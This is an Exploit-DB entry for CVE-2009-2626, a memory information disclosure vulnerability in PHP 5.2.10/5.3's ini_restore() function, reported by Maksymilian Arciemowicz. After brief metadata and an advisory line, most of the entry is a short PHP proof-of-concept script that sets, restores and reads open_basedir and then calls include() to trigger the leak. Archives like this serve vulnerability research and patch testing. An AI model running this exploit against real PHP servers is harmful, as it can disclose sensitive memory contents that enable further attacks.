PHP 5.2.10/5.3 - 'ini_restore' Memory Information Disclosure Vulnerability 2

2009-08-10T00:00:00
ID EDB-ID:33163
Type exploitdb
Reporter Maksymilian Arciemowicz
Modified 2009-08-10T00:00:00

Description

PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (2). CVE-2009-2626. Remote exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/36009/info
 
PHP is prone to an information-disclosure vulnerability.
 
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 

<?php
ini_set("open_basedir", "A");
ini_restore("open_basedir");
ini_get("open_basedir");


include("B");

?>